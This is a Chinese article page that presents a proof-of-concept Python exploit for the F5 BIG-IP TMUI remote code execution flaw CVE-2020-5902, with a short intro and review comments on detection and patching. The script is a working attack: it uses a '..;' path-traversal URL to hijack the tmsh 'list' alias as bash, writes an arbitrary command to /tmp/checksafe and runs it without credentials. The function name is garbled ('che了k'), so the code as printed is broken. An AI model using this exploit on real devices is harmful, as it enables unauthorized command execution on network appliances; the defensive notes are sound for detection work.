
F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)POC

程序员文章站 2024-03-24 19:21:10

https://downloads.f5.com/trial/

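F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)POC

下面的脚本不带任何凭据,依次请求管理界面(TMUI)下的 tmshCmd.jsp 和 fileSave.jsp,所有请求路径都以 `/tmui/login.jsp/..;/` 开头,最后打印设备返回的内容。排查是否被利用时,可在管理界面的访问日志中检索这一路径特征,并检查设备上是否留有 /tmp/checksafe(脚本写入后并不删除),以及私有 tmsh 别名 list 是否被改动。修复版本以 F5 针对 CVE-2020-5902 发布的安全公告为准;在升级之前,应限制不可信网络对管理界面的访问。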

 

import requests   #by 斯文
import sys
import json
# Silences urllib3 warnings for the whole process. Every request in this file is
# sent with verify=False, which would otherwise emit an InsecureRequestWarning
# per call; with this line the script gives no hint that TLS is unverified.
requests.packages.urllib3.disable_warnings()

# ASCII-art banner spelling "CVE-2020-5902"; printed once by the __main__ block.
# NOTE(review): this is a non-raw literal containing backslashes followed by
# spaces and underscores; the trailing spaces on the art lines matter, because a
# backslash directly before a newline would act as a line continuation.
banner= '''
   ______     _______     ____   ___ ____   ___       ____  ___   ___ ____  
  / ___\ \   / / ____|   |___ \ / _ \___ \ / _ \     | ___|/ _ \ / _ \___ \ 
 | |    \ \ / /|  _| _____ __) | | | |__) | | | |____|___ \ (_) | | | |__) |
 | |___  \ V / | |__|_____/ __/| |_| / __/| |_| |_____|__) \__, | |_| / __/ 
  \____|  \_/  |_____|   |_____|\___/_____|\___/     |____/  /_/ \___/_____|                                                 
  
                                                        by Liuyangjun
'''

# Headers attached to every request this script sends: only a desktop-Chrome
# User-Agent, no cookies or credentials. The fixed string can appear in access
# logs but is a weak indicator, since any client can send a different one.
headers = {
    "User-Agent": (
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/83.0.4103.116 Safari/537.36"
    ),
}

def che了k(url: str, cmd: str) -> None:
    """Send the page's CVE-2020-5902 request sequence to ``url`` and print the reply.

    Every request is a GET carrying only the module-level ``headers`` (no
    credentials). Each path starts with ``/tmui/login.jsp/..;/`` and then names
    a JSP under ``/tmui/locallb/workspace/``. In order, the function deletes the
    private tmsh alias ``list``, recreates it as an alias for ``bash``, writes
    ``cmd`` to ``/tmp/checksafe`` through fileSave.jsp, asks tmsh to ``list``
    that file, deletes the alias again, and prints the body of the ``list``
    response.

    Args:
        url: Base URL of the device; the caller strips one trailing slash.
        cmd: Text placed in the ``content`` parameter of the fileSave.jsp request.

    Returns:
        None. Progress messages and the final response body go to stdout.

    Review notes (detection and impact):
        * All four URLs contain the ``..;`` segment after ``login.jsp`` and
          target ``tmshCmd.jsp`` or ``fileSave.jsp``, so management-interface
          access logs can be searched for those strings.
        * The run changes device state: any existing private alias named
          ``list`` is deleted, and ``/tmp/checksafe`` is written and never
          removed by this code, so it remains as a host-side artifact.
        * TLS verification is disabled on every request (``verify=False``).
    """
    try:
        print('[+ 开始测试目标: {}  命令: {}'.format(url,cmd))

        # The four request URLs. They differ only in the JSP that is named and
        # in its query string; the /tmui/login.jsp/..;/ prefix is common to all.
        del_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
        creat_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
        write_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/checksafe&content={}'.format(cmd)
        exec_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/checksafe'
        print('[+ 正在还原alias设置,防止其他人未修改回来了')
        # Step 1: delete any existing private alias named "list". The responses
        # x, y and z are never inspected, so no status code is checked.
        x = requests.get(del_alias,headers=headers,verify=False,timeout=30)
        print('[+ 正在将list命令劫持为bash')
        # Step 2: create the private alias "list" pointing at "bash".
        y = requests.get(creat_alias,headers=headers,verify=False,timeout=30)
        print('[+ 正在写入bash文件')
        # Step 3: write cmd into /tmp/checksafe on the device via fileSave.jsp.
        z = requests.get(write_bash,headers=headers,verify=False,timeout=30)
        print('[+ 正在执行命令,请查看output字段值'+'\n')
        # Step 4: request "list /tmp/checksafe"; only this response (g) is printed.
        g = requests.get(exec_bash,headers=headers,verify=False,timeout=30)
        # Step 5: delete the alias again. /tmp/checksafe is left in place.
        requests.get(del_alias,headers=headers,verify=False,timeout=30)
        text = g.content.decode('utf-8')
        print(text.strip('\n'))
    except:
        # NOTE(review): a bare except catches everything, including
        # KeyboardInterrupt and a UTF-8 decode error, and reports all of it as
        # a reachability problem. If a request fails part-way, the alias
        # deletion in step 5 is not reached.
        print('[- 请查看目标是否可以正常访问')
if __name__ == "__main__":
    # Command-line entry point: argv[1] is the base URL, argv[2] the command text.
    try:
        url = sys.argv[1]
        cmd = sys.argv[2]
        # Drop one trailing slash so the paths appended later do not begin with '//'.
        if url[-1] == '/':url=url[0:-1]
        print(banner)
        # NOTE(review): the function above is printed on this page as `che了k`,
        # so the name `check` is undefined as listed; the resulting NameError is
        # swallowed by the handler below and only the usage line is shown.
        check(url=url,cmd=cmd)

    except Exception as e:
        # Every exception raised above (missing arguments, an empty url, an
        # undefined name) is reduced to the usage line; the error itself is
        # never displayed because the print(e) below is commented out.
        # print(e)
        print('python3 CVE-2020-5902.py http://x.x.x.x  whoami')

 

相关标签: 安全测试类